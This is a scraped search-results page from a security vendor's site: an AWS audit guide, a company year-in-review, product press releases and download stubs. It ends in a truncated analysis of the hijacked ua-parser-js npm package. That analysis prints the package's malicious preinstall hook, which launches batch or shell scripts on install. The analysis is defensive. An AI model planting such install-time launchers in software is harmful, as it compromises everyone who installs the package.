

Search results
Search this site
648 results found with an empty search
- AlgoSec | The Complete Guide to Perform an AWS Security Audit
90% of organizations use a multi-cloud operating model to help achieve their business goals in a 2022 survey. AWS (Amazon Web Services) is among the biggest cloud computing platforms businesses use today. It offers cloud storage via data warehouses or data lakes, data analytics, machine learning, security, and more. Given the prevalence of multi-cloud environments, cloud security is a major concern. 89% of respondents in the above survey said security was a key aspect of cloud success.... Cloud Security The Complete Guide to Perform an AWS Security Audit Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 7/27/23 Published 90% of organizations use a multi-cloud operating model to help achieve their business goals in a 2022 survey. AWS (Amazon Web Services) is among the biggest cloud computing platforms businesses use today. It offers cloud storage via data warehouses or data lakes, data analytics, machine learning, security, and more. Given the prevalence of multi-cloud environments, cloud security is a major concern. 89% of respondents in the above survey said security was a key aspect of cloud success. Security audits are essential for network security and compliance. AWS not only allows audits but recommends them and provides several tools to help, like AWS Audit Manager. In this guide, we share the best practices for an AWS security audit and a detailed step-by-step list of how to perform an AWS audit. We have also explained the six key areas to review. Best practices for an AWS security audit There are three key considerations for an effective AWS security audit: Time it correctly You should perform a security audit: On a regular basis. Perform the steps described below at regular intervals. When there are changes in your organization, such as new hires or layoffs. When you change or remove the individual AWS services you use. This ensures you have removed unnecessary permissions. When you add or remove software to your AWS infrastructure. When there is suspicious activity, like an unauthorized login. Be thorough When conducting a security audit: Take a detailed look at every aspect of your security configuration, including those that are rarely used. Do not make any assumptions. Use logic instead. If an aspect of your security configuration is unclear, investigate why it was instated and the business purpose it serves. Simplify your auditing and management process by using unified cloud security platforms . Leverage the shared responsibility model AWS uses a shared responsibility model. It splits the responsibility for the security of cloud services between the customer and the vendor. A cloud user or client is responsible for the security of: Digital identities Employee access to the cloud Data and objects stored in AWS Any third-party applications and integrations AWS handles the security of: The global AWS online infrastructure The physical security of their facilities Hypervisor configurations Managed services like maintenance and upgrades Personnel screening Many responsibilities are shared by both the customer and the vendor, including: Compliance with external regulations Security patches Updating operating systems and software Ensuring network security Risk management Implementing business continuity and disaster recovery strategies The AWS shared responsibility model assumes that AWS must manage the security of the cloud. The customer is responsible for security within the cloud. Step-by-step process for an AWS security audit An AWS security audit is a structured process to analyze the security of your AWS account. It lets you verify security policies and best practices and secure your users, roles, and groups. It also ensures you comply with any regulations. You can use these steps to perform an AWS security audit: Step 1: Choose a goal and audit standard Setting high-level goals for your AWS security audit process will give the audit team clear objectives to work towards. This can help them decide their approach for the audit and create an audit program. They can outline the steps they will take to meet goals. Goals are also essential to measure the organization’s current security posture. You can speed up this process using a Cloud Security Posture Management (CSPM) tool . Next, define an audit standard. This defines assessment criteria for different systems and security processes. The audit team can use the audit standard to analyze current systems and processes for efficiency and identify any risks. The assessment criteria drive consistent analysis and reporting. Step 2: Collect and review all assets Managing your AWS system starts with knowing what resources your organization uses. AWS assets can be data stores, applications, instances, and the data itself. Auditing your AWS assets includes: Create an asset inventory listing: Gather all assets and resources used by the organization. You can collect your assets using AWS Config, third-party tools, or CLI (Command Line Interface) scripts. Review asset configuration: Organizations must use secure configuration management practices for all AWS components. Auditors can validate if these standards are competent to address known security vulnerabilities. Evaluate risk: Asses how each asset impacts the organization’s risk profile. Integrate assets into the overall risk assessment program. Ensure patching: Verify that AWS services are included in the internal patch management process. Step 3: Review access and identity Reviewing account and asset access in AWS is critical to avoid cybersecurity attacks and data breaches. AWS Identity and Access Management (IAM ) is used to manage role-based access control. This dictates which users can access and perform operations on resources. Auditing access controls include: Documenting AWS account owners: List and review the main AWS accounts, known as the root accounts. Most modern teams do not use root accounts at all, but if needed, use multiple root accounts. Implement multi-factor authentication (MFA): Implement MFA for all AWS accounts based on your security policies. Review IAM user accounts: Use the AWS Management Console to identify all IAM users. Evaluate and modify the permissions and policies for all accounts. Remove old users. Review AWS groups: AWS groups are a collection of IAM users. Evaluate each group and the permissions and policies assigned to them. Remove old groups. Check IAM roles: Create job-specific IAM roles. Evaluate each role and the resources it has access to. Remove roles that have not been used in 90 days or more. Define monitoring methods: Install monitoring methods for all IAM accounts and roles. Regularly review these methods. Use least privilege access: The Principle of Least Privilege Access (PoLP) ensures users can only access what they need to complete a task. It prevents overly-permissive access controls and the misuse of systems and data. Implement access logs: Use access logs to track requests to access resources and changes made to resources. Step 4: Analyze data flows Protecting all data within the AWS ecosystem is vital for organizations to avoid data leaks. Auditors must understand the data flow within an organization. This includes how data moves from one system to another in AWS, where data is stored, and how it is protected. Ensuring data protection includes: Assess data flow: Check how data enters and exits every AWS resource. Identify any vulnerabilities in the data flows and address them. Ensure data encryption: Check if all data is encrypted at rest and in transit. Review connection methods: Check connection methods to different AWS systems. Depending on your workloads, this could include AWS Console, S3, RDS (relational database service), and more. Use key management services: Ensure data is encrypted at rest using AWS key management services. Use multi-cloud management services: Since most organizations use more than one cloud system, using multi-cloud CSPM software is essential. Step 5: Review public resources Elements within the AWS ecosystem are intentionally public-facing, like applications or APIs. Others are accidentally made public due to misconfiguration. This can lead to data loss, data leaks, and unintended access to accounts and services. Common examples include EBS snapshots, S3 objects, and databases. Identifying these resources helps remediate risks by updating access controls. Evaluating public resources includes: Identifying all public resources: List all public-facing resources. This includes applications, databases, and other services that can access your AWS data, assets, and resources. Conduct vulnerability assessments: Use automated tools or manual techniques to identify vulnerabilities in your public resources. Prioritize the risks and develop a plan to address them. Evaluate access controls: Review the access controls for each public resource and update them as needed. Remove unauthorized access using security controls and tools like S3 Public Access Block and Guard Duty. Review application code: Check the code for all public-facing applications for vulnerabilities that attackers could exploit. Conduct tests for common risks such as SQL injection, cross-site scripting (XSS), and buffer overflows. Key AWS areas to review in a security audit There are six essential parts of an AWS system that auditors must assess to identify risks and vulnerabilities: Identity access management (IAM) AWS IAM manages the users and access controls within the AWS infrastructure. You can audit your IAM users by: List all IAM users, groups, and roles. Remove old or redundant users. Also, remove these users from groups. Delete redundant or old groups. Remove IAM roles that are no longer in use. Evaluate each role’s trust and access policies. Review the policies assigned to each group that a user is in. Remove old or unnecessary security credentials. Remove security credentials that might have been exposed. Rotate long-term access keys regularly. Assess security credentials to identify any password, email, or data leaks. These measures prevent unauthorized access to your AWS system and its data. Virtual private cloud (VPC) Amazon Virtual Private Cloud (VPC) enables organizations to deploy AWS services on their own virtual network. Secure your VPC by: Checking all IP addresses, gateways, and endpoints for vulnerabilities. Creating security groups to control the inbound and outbound traffic to the resources within your VPC. Using route tables to check where network traffic from each subnet is directed. Leveraging traffic mirroring to copy all traffic from network interfaces. This data is sent to your security and monitoring applications. Using VPC flow logs to capture information about all IP traffic going to and from the network interfaces. Regularly monitor, update, and assess all of the above elements. Elastic Compute Cloud (EC2) Amazon Elastic Compute Cloud (EC2) enables organizations to develop and deploy applications in the AWS Cloud. Users can create virtual computing environments, known as instances, to launch as servers. You can secure your Amazon EC2 instances by: Review key pairs to ensure that login information is secure and only authorized users can access the private key. Eliminate all redundant EC2 instances. Create a security group for each EC2 instance. Define rules for inbound and outbound traffic for every instance. Review security groups regularly. Eliminate unused security groups. Use Elastic IP addresses to mask instance failures and enable instant remapping. For increased security, use VPCs to deploy your instances. Storage (S3) Amazon S3, or Simple Storage Service, is a cloud-native object storage platform. It allows users to store and manage large amounts of data within resources called buckets. Auditing S3 involves: Analyze IAM access controls Evaluate access controls given using Access Control Lists (ACLs) and Query String Authentication Re-evaluate bucket policies to ensure adequate object permissions Check S3 audit logs to identify any anomalies Evaluate S3 security configurations like Block Public Access, Object Ownership, and PrivateLink. Use Amazon Macie to get alerts when S3 buckets are publically accessible, unencrypted, or replicated. Mobile apps Mobile applications within your AWS environment must be audited. Organizations can do this by: Review mobile apps to ensure none of them contain access keys. Use MFA for all mobile apps. Check for and remove all permanent credentials for applications. Use temporary credentials so you can frequently change security keys. Enable multiple login methods using providers like Google, Amazon, and Facebook. Threat detection and incident response The AWS cloud infrastructure must include mechanisms to detect and react to security incidents. To do this, organizations and auditors can: Create audit logs by enabling AWS CloudTrail, storing and access logs in S3, CloudWatch logs, WAF logs, and VPC Flow Logs. Use audit logs to track assessment trails and detect any deviations or notable events Review logging and monitoring policies and procedures Ensure all AWS services, including EC2 instances, are monitored and logged Install logging mechanisms to centralize logs on one server and in proper formats Implement a dynamic Incident Response Plan for AWS services. Include policies to mitigate cybersecurity incidents and help with data recovery. Include AWS in your Business Continuity Plan (BCP) to improve disaster recovery. Dictate policies related to preparedness, crisis management elements, and more. Top tools for an AWS audit You can use any number of AWS security options and tools as you perform your audit. However, a Cloud-Native Application Protection Platform (CNAPP) like Horizon ACE is the ideal tool for an AWS audit. It combines the features of multiple cloud security solutions and automates security management. Horizon ACE increases efficiency by enabling fast and secure agentless cloud security configuration management. It supports Amazon AWS, Microsoft Azure, and Google Cloud. All security issues across these vendors are shown on a single dashboard. You can also perform a manual comprehensive AWS audit using multiple AWS tools: Identity and access management: AWS IAM and AWS IAM Access Analyzer Data protection: AWS Macie and AWS Secrets Manager Detection and monitoring: AWS Security Hub, Amazon GuardDuty, AWS Config, AWS CloudTrail, AWS CloudWatch Infrastructure protection: AWS Web Application Firewall, AWS Shield A manual audit of different AWS elements can be time-consuming. Auditors must juggle multiple tools and gather information from various reports. A dynamic platform like Horizon ACE speeds up this process. It scans all elements within your AWS systems in minutes and instantly displays any threats on the dashboard. The bottom line on AWS security audits Security audits are essential for businesses using AWS infrastructures. Maintaining network security and compliance via an audit prevents data breaches, prevents cyberattacks, and protects valuable assets. A manual audit using AWS tools can be done to ensure safety. However, an audit of all AWS systems and processes using Horizon ACE is more comprehensive and reliable. It helps you identify threats faster and streamlines the security management of your cloud system. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- AlgoSec | 2024 in review: A transformative year for AlgoSec in secure application connectivity
Discover AlgoSec's transformative 2024 journey: innovation in secure connectivity, industry leadership, and a bold vision for an empowered, Network Security 2024 in review: A transformative year for AlgoSec in secure application connectivity Adel Osta Dadan 2 min read Adel Osta Dadan Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 12/16/24 Published As we close out 2024, I find myself reflecting on what has truly been a transformative journey for AlgoSec . This year has been filled with ground-breaking innovation, meaningful industry recognition, and a deep commitment to our vision of secure application connectivity. It has been a year where every challenge was met with determination, every milestone became a stepping-stone toward a greater future, and every success strengthened our resolve to lead in secure connectivity. Q1: Redefining secure application connectivity. We started the year by challenging traditional approaches to secure application connectivity, setting the tone for everything that followed. State of Network Security Report : The release of our State of Network Security Report was the first major milestone, quickly becoming a cornerstone of our thought leadership. This report highlighted major trends such as the enduring importance of hybrid networks and the growing shift toward multi-cloud strategies. We emphasized that security could—and should—be a driver of digital transformation. The findings made it clear that advanced tools like SD-WAN and SASE are no longer optional but essential for navigating today’s increasingly complex connectivity landscape. Launch of AlgoSec A33: In March, we launched AlgoSec A33, an application-first approach to security management. This was not just another product release; it was a clear statement of our belief that security should be an enabler of business growth. With A33, we offered seamless integration into business processes, aligning security with broader organizational goals. This launch symbolized our commitment to making secure application connectivity the foundation for organizational success. Q2: Advancing security automation and building connections. Building on the momentum from Q1, the second quarter was about advancing our automation capabilities and strengthening connections within our community. Recognition from GigaOm and Gartner : During Q2, we received meaningful recognition from GigaOm and Gartner, being named an Established Vendor in Gartner Peer Insights Voice of the Customer for Secure Connectivity Automation Platforms. This recognition validated our dedication to combining intelligent automation with human expertise, simplifying network security across increasingly complex multi-cloud environments. It was a proud moment that affirmed our efforts and pushed us to do even more. Industry Conversations on Secure Connectivity: We also took the lead in important industry conversations during this period. From enhancing visibility to tackling the challenges of multi-cloud security, AlgoSec was at the forefront—delivering solutions that drove operational efficiency while addressing the real-world challenges faced by our customers. These conversations reinforced our position as a proactive leader committed to shaping the future of secure connectivity. Q3: Setting new standards in secure connectivity. Moving into Q3, our goal was to push the boundaries further and set new industry standards for secure connectivity. Introduction of Security Application Connectivity. Anywhere (SACA): One of the major highlights of the third quarter was the introduction of our Security Application Connectivity Anyware (SACA) framework. SACA embodied our vision that secure connectivity is fundamental to digital transformation. By providing our customers with confidence in their application flows—without sacrificing performance or agility—we enabled them to innovate with assurance. AlgoSummit 2024: In September, we hosted AlgoSummit 2024—our flagship event that brought together customers, partners, and industry experts. AlgoSummit was not just an event but a collaborative platform for shared learning and innovation. Together, we explored the evolving landscape of secure connectivity in hybrid and multi-cloud environments. This summit further solidified AlgoSec's role as a visionary leader in the industry, committed to both solving today’s challenges and anticipating those of tomorrow. Q4: Expanding Zero Trust and navigating regulatory changes. As we entered the final quarter, our focus shifted to expanding our Zero Trust offerings and helping customers prepare for upcoming regulatory changes. Zero Trust Architecture Expansion: We made significant strides in advancing our Zero Trust network architecture initiatives in Q4. As hybrid environments grow more complex, we understood the need to simplify Zero Trust adoption for our customers. By leveraging both micro and macro-segmentation strategies, we offered a streamlined, application-centric approach that provided greater visibility and control—ensuring that connectivity remained secure, segmented, and compliant. Navigating DORA Compliance : Another key focus for Q4 was helping our customers navigate the requirements of the Digital Operational Resilience Act (DORA). With the compliance deadline fast approaching, we used our intelligent automation tools to make the transition as smooth as possible. Our solutions offered comprehensive visibility, automated risk assessments, and policy recertification, allowing financial institutions to meet DORA’s stringent standards confidently and strengthen their resilience. Recognition for innovation and ethical leadership Throughout the year, our commitment to responsible innovation and ethical leadership did not go unnoticed. SC Awards Finalist in Application Security: Being named a finalist in the SC Awards for Application Security was a significant milestone, reaffirming our dedication to protecting the applications that drive business growth and innovation. Top InfoSec Innovator Award from CyberDefense Magazine: In November, we were recognized as a Top InfoSec Innovator by CyberDefense Magazine. This accolade underscored our focus on ethical innovation—delivering security solutions that are trustworthy, responsible, and aligned with global standards. Accolades in Network and Application Security : Additionally, we were named a Hot Company in Secure Application Connectivity and recognized as the Most Innovative in Application Security. These awards were not just acknowledgments of our technology but a testament to our ongoing commitment to setting new standards of transparency, accountability, and secure connectivity. Cisco Meraki Marketplace Tech Partner of the Month : In October 2024, we were honored as the Cisco Meraki Marketplace Tech Partner of the Month based on our continued innovation and dedication to application security . This recognition highlights our ability to deliver holistic visibility, automate security policy changes, reduce risks, and ensure continuous compliance through seamless integration with Cisco Meraki solutions. Looking to the future: building on the foundations of 2024 Reflecting on 2024, it’s clear that this has been a year of significant growth, innovation, and resilience. The lessons we’ve learned and the progress we’ve made have laid a strong foundation for the future. As we look ahead to 2025, our mission remains clear: to continue providing application-centric security solutions that not only protect but also empower our customers to achieve their strategic objectives. I am incredibly grateful for the dedication of our team, the trust our customers have placed in us, and the opportunity to continue shaping the future of secure connectivity. Here’s to another year of impactful innovation, collaboration, and leadership as we step confidently into 2025. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- AlgoSec Introduces New Integration with IBM Resilient to Accelerate Incident Response
AlgoSec’s incident response integration extends collaboration to add critical business context to incident information and automates threat remediation AlgoSec Introduces New Integration with IBM Resilient to Accelerate Incident Response AlgoSec’s incident response integration extends collaboration to add critical business context to incident information and automates threat remediation February 28, 2019 Speak to one of our experts Ridgefield Park, NJ (February 28, 2019) – AlgoSec , the leading provider of business-driven network security management solutions, today announced a new integration with the IBM® Resilient® Incident Response Platform (IRP), enabling organizations to tie security incidents and attacks directly to the business processes that could be impacted. AlgoSec’s integration provides security analysts with the ability to enrich the Resilient IRP with critical business and network context to immediately assess an incident’s potential business impact, and to prioritize and automate remediation efforts accordingly. Leveraging Resilient’s open application programming interfaces (API), the AlgoSec integration with Resilient allows joint users to: Quickly highlight in the Resilient dashboard which applications are impacted by an incident, and how business-critical those applications are Automatically associate security incidents with the applications, servers, network connectivity flows and security devices impacted by an attack Identify network connectivity to and from compromised servers, such as connectivity to the internet or to sensitive networks Automatically implement change requests to quickly isolate compromised servers from the rest of the network and the public Internet Get key insights to assist with cyber-threat forensics and compliance reporting With this new integration, security analysts can quickly reduce the impact of attacks on the business. The AlgoSec integration for the Resilient IRP helps block attempts at data exfiltration and makes it more difficult for hackers to move laterally within the network from affected servers. The integration helps organizations to streamline and accelerate their IR processes by automating time-consuming security changes and proactively analysing business risk. “SOC teams need to quickly sift through the volumes of complex alerts they receive each day, to identify the attacks that could affect key business processes and take action before they cause disruption and damage,” said Anner Kushnir, VP of Technology at AlgoSec. “The new AlgoSec integration with IBM Resilient enables joint customers to link cyber-attacks directly to the business applications that are being targeted, and then prioritize and automate their remediation efforts based on the attack’s severity and risk to the business –aligning incident response processes with the overall business strategy.” As part of this integration, AlgoSec has extended their offerings on the IBM Security App Exchange , a marketplace where developers across the industry can share applications based on IBM Security technologies. As threats are evolving faster than ever, collaborative development amongst the cyber community will help organizations adapt quickly and speed innovation in the fight against cybercrime. About AlgoSec The leading provider of business-driven network security management solutions, AlgoSec helps the world’s largest organizations align security with their mission-critical business processes. With AlgoSec, users can discover, map and migrate business application connectivity, proactively analyze risk from the business perspective, tie cyber-attacks to business processes and intelligently automate network security changes with zero touch – across their cloud, SDN and on-premise networks. Over 1,800 enterprises , including 20 of the Fortune 50, have utilized AlgoSec’s solutions to make their organizations more agile, more secure and more compliant – all the time. Since 2005, AlgoSec has shown its commitment to customer satisfaction with the industry’s only money-back guarantee. All product and company names herein may be trademarks of their registered owners. *** Media Contacts:Tsippi [email protected] Craig CowardContext Public [email protected]+44 (0)1625 511 966
- Enhancing Zero Trust Network Security - AlgoSec
Enhancing Zero Trust Network Security Download PDF Download PDF Add a Title Add a Title Add a Title Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue
- AlgoSec Horizon A33.30 eliminates security silos, accelerates application delivery, automates policy management and continuously reduces cyber risk
Horizon unifies application connectivity governance across hybrid and multi-cloud environments through AI-powered automation AlgoSec Horizon A33.30 eliminates security silos, accelerates application delivery, automates policy management and continuously reduces cyber risk Horizon unifies application connectivity governance across hybrid and multi-cloud environments through AI-powered automation July 22, 2026 Speak to one of our experts RIDGEFIELD PARK, NJ – July 22, 2026 – AlgoSec , global leader in application-centric security management, today announced the latest release of Horizon A33.30, its unified platform for securing application connectivity across hybrid and multi-cloud environments. The release helps security teams accelerate secure application delivery, reduce operational complexity and strengthen policy governance. As enterprises accelerate cloud adoption, AI initiatives and digital transformation, security teams are under increasing pressure to enable business innovation without compromising security or compliance. Yet many organizations continue to rely on fragmented security tools, disconnected workflows and manual processes that slow application delivery, increase operational costs and create unnecessary risk. Horizon A33.30 helps organizations break down those silos. The platform brings together application, policy, risk and compliance context so security teams can govern secure application connectivity without having to r ely on a patchwork of isolated security tools. "Security should never be the reason business slows down," said Eran Shiff, Chief Product Officer at AlgoSec. "Today's enterprises don't need another point product – they need a unified platform that understands applications, business context and risk across every environment. Horizon enables organizations to replace fragmented security operations with intelligent automation, giving them the confidence to innovate faster while reducing operational complexity and cyber risk." With Horizon A33.30, organizations can: Unify security across hybrid and multi-cloud environments: Modern enterprises operate across data centers, public cloud, private cloud, SDN, Kubernetes and SaaS environments. but security operations often remain fragmented across tools and teams. Horizon A33.30 gives security teams a unified way to govern application connectivity and policy across this complex infrastructure. The release expands support for Check Point Smart-1 Cloud , including traffic simulation query and risk assessment capabilities. The release also expands support for additional cloud-managed security platforms, including Palo Alto Networks Strata Cloud Manager capabilities, Azure Firewall automation, Google Cloud security services and AWS Network Firewall – giving security teams a single operational view of application connectivity and policy across their entire infrastructure. Accelerate secure application delivery: Rather than treating security as a bottleneck, Horizon A33.30 helps organizations securely deliver applications faster without compromising governance, compliance or control. Combining AI-powered application discovery , flow-level recertification, traffic simulation, impact analysis and policy automation , the platform enables Security and networking teams to gain deep visibility into application dependencies before implementing changes, dramatically reducing deployment delays, troubleshooting time and business disruption. Transform security operations through intelligent automation: One in five organizations still relies primarily on manual security processes. Horizon A33.30 introduces expanded automation capabilities that eliminate manual policy management while maintaining governance. Enhanced workflows, Azure Firewall automation, new REST APIs, AI-powered natural language queries and streamlined user experiences help security teams automate repetitive work, reduce human error and focus on strategic security initiatives instead of operational overhead. Continuously reduce cyber risk and strengthen compliance: Security is most effective when it's continuous, not reactive. Horizon A33.30 introduces new compliance reporting for NIS2, updated PCI DSS and SWIFT frameworks, expanded risk intelligence, customizable tag-based risk definitions and enhanced cloud security analysis, enabling organizations to continuously identify, prioritize and remediate risk while maintaining audit-ready compliance across hybrid environments. To learn more about the new Horizon A33.30 product release, click here . About AlgoSec AlgoSec, a global cybersecurity leader, empowers organizations to securely accelerate application delivery up to 100 times faster by automating application connectivity and security policy across the hybrid network environment. With two decades of expertise securing hybrid networks, over 2300 of the world's most complex organizations trust AlgoSec to help secure their most critical workloads. AlgoSec Horizon platform utilizes advanced AI capabilities, enabling users to automatically discover and identify their business applications across multi-clouds, and remediate risks more effectively. It serves as a single source for visibility into security and compliance issues across the hybrid network environment, to ensure ongoing adherence to internet security standards, industry, and internal regulations. Additionally, organizations can leverage intelligent change automation to streamline security change processes, thus improving security and agility. Learn how AlgoSec enables application owners, information security experts, SecOps and cloud security teams to deploy business applications faster while maintaining security at www.algosec.com . MEDIA CONTACT: Angie Barrell Alloy, on behalf of AlgoSec [email protected]
- AlgoSec Horizon AppViz Application visibility for AlgoSec Horizon Security Analyzer - AlgoSec
AlgoSec Horizon AppViz Application visibility for AlgoSec Horizon Security Analyzer Download PDF Download PDF Add a Title Add a Title Add a Title Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue
- Juniper and AlgoSec | AlgoSec
AlgoSec & Juniper Networks AlgoSec seamlessly integrates with Juniper devices to automate application and user aware security policy management and ensure that Juniper devices are properly configured. AlgoSec supports the entire security policy management lifecycle — from application connectivity discovery, through ongoing management and compliance, to rule recertification and secure decommissioning. How to Juniper Policy Optimization Learn how to achieve a clean and optimized security policy on your Juniper device Juniper Regulatory Compliance Learn how to prepare for a regulatory audit Juniper Risk Assessment Learn how to assess risk on your Juniper devices with AlgoSec See how Juniper Users Can Benefit from AlgoSec Schedule time with one of our experts
- AlgoSec for GDPR - AlgoSec
AlgoSec for GDPR Download PDF Download PDF Add a Title Add a Title Add a Title Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue
- Our customers | AlgoSec
Discover how global customers use Algosec to enhance their network security, streamline operations, and ensure continuous compliance. Our customers Financial Services Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Show more We empower the world’s most complex organizations to gain visibility, reduce risk and process changes at zero-touch across the hybrid network. NCR Nationwide Insurance Testimonial See what people who use AlgoSec have to say about it Read customers stories Filter by industry All industries Energy and Utilities Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Show more Government Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Show more Healthcare & Pharmaceuticals Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Show more Motor Vehicles Read the story Read the story Read the story Read the story Read the story Read the story Show more Technology Read the story Read the story Show more Retail and Consumer Goods Read the story Read the story Read the story Read the story Read the story Read the story Show more Telecom, IT, MSSP Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Show more Transportation Read the story Show more Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue
- AlgoSec Launches AlgoSec Horizon, its Most Advanced Application-Centric Security Platform for Converging Cloud and On-Premise Environments
AlgoSec Horizon platform empowers organizations to seamlessly secure applications across complex, converging cloud and on-premise network environments with AI-driven visibility, automation and risk mitigation AlgoSec Launches AlgoSec Horizon, its Most Advanced Application-Centric Security Platform for Converging Cloud and On-Premise Environments AlgoSec Horizon platform empowers organizations to seamlessly secure applications across complex, converging cloud and on-premise network environments with AI-driven visibility, automation and risk mitigation February 11, 2025 Speak to one of our experts RIDGEFIELD PARK, NJ, February 11, 2025 – AlgoSec , a global cybersecurity leader, today announced the launch of AlgoSec Horizon , the industry's first and only application-centric security management and automation platform designed for hybrid networks. By applying an application-centric approach to security, the AlgoSec Horizon platform enables security teams to manage application connectivity and security policies consistently across both cloud and data center environments. Gartner predicts that by 2027 , 50% of critical enterprise applications will reside outside of centralized public cloud locations, underscoring the ongoing expansion, evolution and complexity of today’s network infrastructures. Yet, many businesses still have a segmented team that splits focus between development and security teams in an effort to ensure holistic protection. To combat these challenges, businesses are embracing unified platforms that converge cloud and data center security teams to align strategies, unify policy enforcement and ensure consistent security within hybrid environments. “Today's networks are 100x more complex as a result of the rapid acceleration of application deployment and network complexity, requiring organizations to embrace platformization to unify security operations, automate policies and enhance visibility across infrastructures,” said Eran Shiff , VP Product of AlgoSec. “With the launch of the AlgoSec Horizon Platform, organizations now have full visibility into their hybrid-cloud network, allowing for increased security without business productivity interference.” As the first and only application-centric security management and automation platform for the hybrid network, AlgoSec Horizon utilizes advanced AI capabilities to automatically discover and identify an organization’s business applications across multi-clouds and data centers, and remediate risks more effectively. The platform serves as a single source for visibility into security and compliance issues across hybrid network environments to ensure adherence to security standards and regulations. Through AlgoSec Horizon, organizations are able to: ● Visualize application connectivity: Utilize advanced AI modules to discover and identify running business applications within an organization’s network, including their connectivity, network zones, risks, vulnerabilities and resources, to reduce operational complexity and simplify management. ● Securely automate application connectivity changes: Ensure smooth business operations by intelligently automating security policy changes with a focus on business applications. AlgoSec’s intelligent automation minimizes misconfigurations and enhances operational resilience to accelerate application delivery from weeks to hours. ● Prioritize risk mitigation based on business context: Prioritize remediation efforts based on the criticality of affected applications and associated risks, to ensure resources are effectively allocated to protect vital business processes. AlgoSec helps prioritize security efforts based on the criticality of business applications, industry best practices, relevant regulations and specific security policies, to ensure the most severe vulnerabilities are addressed first. ● Maintain application-centric compliance: Streamline regulatory adherence, make audits faster and easier to manage, and ensure that organizations remain compliant with minimal effort and reduce the risk of non-compliance penalties across the entire hybrid environment. During Cisco Live 2025 Amsterdam , AlgoSec will invite attendees to experience and demo the Horizon Platform at stand C05. To request a media briefing with AlgoSec at the show, please email [email protected] . About AlgoSec AlgoSec, a global cybersecurity leader, empowers organizations to securely accelerate application delivery up to 10 times faster by automating application connectivity and security policy across the hybrid network environment. With two decades of expertise securing hybrid networks, over 2,200 of the world's most complex organizations trust AlgoSec to help secure their most critical workloads. AlgoSec Horizon platform utilizes advanced AI capabilities, enabling users to automatically discover and identify their business applications across multi-clouds and datacenters, and remediate risks more effectively. It serves as a single source for visibility into security and compliance issues across the hybrid network environment, to ensure ongoing adherence to internet security standards, industry, and internal regulations. Additionally, organizations can leverage intelligent change automation to streamline security change processes, thus improving security and agility. Learn how AlgoSec enables application owners, information security experts, SecOps and cloud security teams to deploy business applications faster while maintaining security at www.algosec.com . MEDIA CONTACT: Michelle Rand Alloy, on behalf of AlgoSec [email protected] 855-300-8209
- AlgoSec | Hijacked NPM Account Leads to Critical Supply Chain Compromise
As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. The author of the package, Faisal Salman – a software developer from Indonesia, has commented about the incident: Hi all, very sorry about this. I noticed something unusual when my email was suddenly flooded by spams from hundreds of... Cloud Security Hijacked NPM Account Leads to Critical Supply Chain Compromise Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/24/21 Published As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. The author of the package, Faisal Salman – a software developer from Indonesia, has commented about the incident: Hi all, very sorry about this. I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don’t realize something was up, luckily the effect is quite the contrary). I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0 I have sent a message to NPM support since I can’t seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish ) so I can only deprecate them with a warning message. There are more than 2.5 million other repositories that depend on ua-parser-js . Google search “file:ua-parser-js.js” reveals nearly 2 million websites, which indicates the package is popular. As seen in the source code diff , the newly added file package/preinstall.js will check the OS platform. If it’s Windows, the script will spawn a newly added preinstall.bat script. If the OS is Linux, the script will call terminalLinux() function, as seen in the source below: var opsys = process.platform; if ( opsys == "darwin" ) { opsys = "MacOS" ; } else if ( opsys == "win32" || opsys == "win64" ) { opsys = "Windows" ; const { spawn } = require ( 'child_process' ) ; const bat = spawn ( 'cmd.exe' , [ '/c' , 'preinstall.bat' ]) ; } else if ( opsys == "linux" ) { opsys = "Linux" ; terminalLinux () ; } The terminalLinux() function will run the newly added preinstall.sh script. function terminalLinux(){ exec( "/bin/bash preinstall.sh" 